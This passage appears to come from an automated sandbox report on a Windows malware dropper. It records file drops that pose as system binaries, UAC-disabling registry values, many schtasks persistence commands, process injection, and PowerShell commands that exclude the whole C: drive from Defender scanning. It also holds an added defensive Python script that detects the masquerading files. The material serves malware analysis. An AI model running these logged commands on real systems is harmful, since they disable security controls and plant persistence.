File opened for modification C:\Program Files\Windows Media Player\es-ES\RCX8FB2.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files\Windows Multimedia Platform\RCX9A08.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\Windows Media Player\es-ES\e15c75ee0b3582 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\VideoLAN\6ccacd8608530f C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files\dotnet\shared\RCX93DB.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files\dotnet\shared\OfficeClickToRun.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files\VideoLAN\RCX95EF.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files\VideoLAN\Idle.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\PLA\RCX97F3.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Windows\PLA\RuntimeBroker.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Windows\DigitalLocker\en-US\886983d96e3d3e C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Windows\DigitalLocker\en-US\csrss.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Windows\servicing\ja-JP\sppsvc.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Windows\PLA\RuntimeBroker.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Windows\PLA\9e8d7a4ca61bd9 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Windows\OCR\RuntimeBroker.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Windows\DigitalLocker\en-US\csrss.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
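The "Executes dropped EXE" and the two "Drops file" tables above show the dropper writing copies of itself under the names of genuine Windows binaries (sihost.exe, RuntimeBroker.exe, csrss.exe, sppsvc.exe) into directories where those binaries never live (C:\Windows\PLA, C:\Windows\DigitalLocker\en-US, C:\Program Files (x86)\Windows Portable Devices), and placing a file named with 14 hex characters (66fc9ff0ee96c2, 9e8d7a4ca61bd9, 886983d96e3d3e, ...) beside each copy; the RCX*.tmp entries appear in each target directory just before the final name and are left out of the checks. Both traits are cheap to test for. The following Python is an added example, not part of the report: a masquerading check over file paths, run on rows constructed from this report's file tables. The set of System32 binary names is an assumption limited to the names on this page, and the companion-file heuristic is derived only from what this report shows.

```python
import ntpath
import re
from collections import defaultdict

# Names this sample reuses for its copies. All are genuine Windows binaries whose
# only legitimate home is a system directory. (Assumed list, limited to names in
# this report; a production allowlist would be much longer.)
SYSTEM32_BINARIES = {"sihost.exe", "runtimebroker.exe", "csrss.exe", "sppsvc.exe", "sppextcomobj.exe"}
CANONICAL_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")
# Every copy in this report is written next to a file named with 14 hex characters.
COMPANION_RE = re.compile(r"^[0-9a-f]{14}$")

# "<File created|File opened for modification> <path, may contain spaces> <process> N/A"
FILE_ROW_RE = re.compile(
    r"^(?P<action>File created|File opened for modification)\s+"
    r"(?P<path>[A-Za-z]:\\.+?)\s+(?P<process>[A-Za-z]:\\\S+)\s+N/A$"
)

def parse_file_rows(lines):
    rows = []
    for line in lines:
        m = FILE_ROW_RE.match(line.strip())
        if m:
            rows.append(m.groupdict())
    return rows

def is_masquerade(path):
    """True when the file name belongs to a System32 binary but the directory does not."""
    directory, name = ntpath.split(path)
    if name.lower() not in SYSTEM32_BINARIES:
        return False
    d = directory.lower()
    return not any(d == c or d.startswith(c + "\\") for c in CANONICAL_DIRS)

def find_masquerades(rows):
    return sorted({r["path"] for r in rows if is_masquerade(r["path"])})

def find_companion_drops(rows):
    """Directories in which an .exe was created alongside a 14-hex-character file."""
    created = defaultdict(set)
    for r in rows:
        if r["action"] == "File created":
            directory, name = ntpath.split(r["path"])
            created[directory.lower()].add(name)
    hits = {}
    for directory, names in created.items():
        exes = sorted(n for n in names if n.lower().endswith(".exe"))
        companions = sorted(n for n in names if COMPANION_RE.match(n))
        if exes and companions:
            hits[directory] = (exes, companions)
    return hits

def triage(lines):
    rows = parse_file_rows(lines)
    return {"masquerades": find_masquerades(rows), "companion_drops": find_companion_drops(rows)}

# Sample rows constructed from this report's file tables, plus one negative control.
DROPPER = r"C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe"
SAMPLE_ROWS = [
    rf"File created C:\Program Files (x86)\Windows Portable Devices\sihost.exe {DROPPER} N/A",
    rf"File created C:\Program Files (x86)\Windows Portable Devices\66fc9ff0ee96c2 {DROPPER} N/A",
    rf"File opened for modification C:\Program Files (x86)\Windows Portable Devices\RCX8B1B.tmp {DROPPER} N/A",
    rf"File created C:\Program Files\VideoLAN\Idle.exe {DROPPER} N/A",
    rf"File created C:\Program Files\VideoLAN\6ccacd8608530f {DROPPER} N/A",
    rf"File created C:\Windows\PLA\RuntimeBroker.exe {DROPPER} N/A",
    rf"File created C:\Windows\PLA\9e8d7a4ca61bd9 {DROPPER} N/A",
    rf"File created C:\Windows\DigitalLocker\en-US\csrss.exe {DROPPER} N/A",
    rf"File created C:\Windows\DigitalLocker\en-US\886983d96e3d3e {DROPPER} N/A",
    rf"File created C:\Windows\servicing\ja-JP\sppsvc.exe {DROPPER} N/A",
    # constructed negative control: the real RuntimeBroker.exe location is not a masquerade
    rf"File created C:\Windows\System32\RuntimeBroker.exe {DROPPER} N/A",
]

if __name__ == "__main__":
    result = triage(SAMPLE_ROWS)
    for p in result["masquerades"]:
        print("masquerade:", p)
    for d, (exes, companions) in sorted(result["companion_drops"].items()):
        print("companion drop:", d, exes, companions)
```

The name check catches Idle.exe and OfficeClickToRun.exe only through the companion-file pairing, since neither is a System32 binary; on a live host the same pairing can be searched for with a directory walk, and a file whose name matches a System32 binary can additionally be checked for a valid Microsoft signature, which the report's "Unsigned PE" finding says these copies lack.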

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp5DEA.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpDDA9.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpC208.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp8E8F.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpF39.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp2D35.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp2BD9.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings C:\Users\Default\Pictures\SppExtComObj.exe N/A (10 identical rows)
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A (2 identical rows)

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A (42 identical rows)

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4384 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe
PID 4600 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe
PID 4384 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 4636 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe
PID 540 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe
PID 540 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 3260 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 3104 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5004 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe

"C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Portable Devices\sihost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Portable Devices\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Users\Public\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Public\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafNf" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Media Player\es-ES\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\es-ES\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafNf" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Media Player\es-ES\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 14 /tr "'C:\Program Files\dotnet\shared\OfficeClickToRun.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files\dotnet\shared\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\Program Files\dotnet\shared\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\Program Files\VideoLAN\Idle.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Program Files\VideoLAN\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Windows\PLA\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\PLA\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\PLA\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Multimedia Platform\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Multimedia Platform\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 5 /tr "'C:\Windows\Temp\MsEdgeCrashpad\reports\SppExtComObj.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Windows\Temp\MsEdgeCrashpad\reports\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 6 /tr "'C:\Windows\Temp\MsEdgeCrashpad\reports\SppExtComObj.exe'" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe

"C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Desktop\fontdrvhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Admin\Desktop\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\Desktop\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Pictures\SppExtComObj.exe'" /f

C:\Windows\system32\schtasks.exe

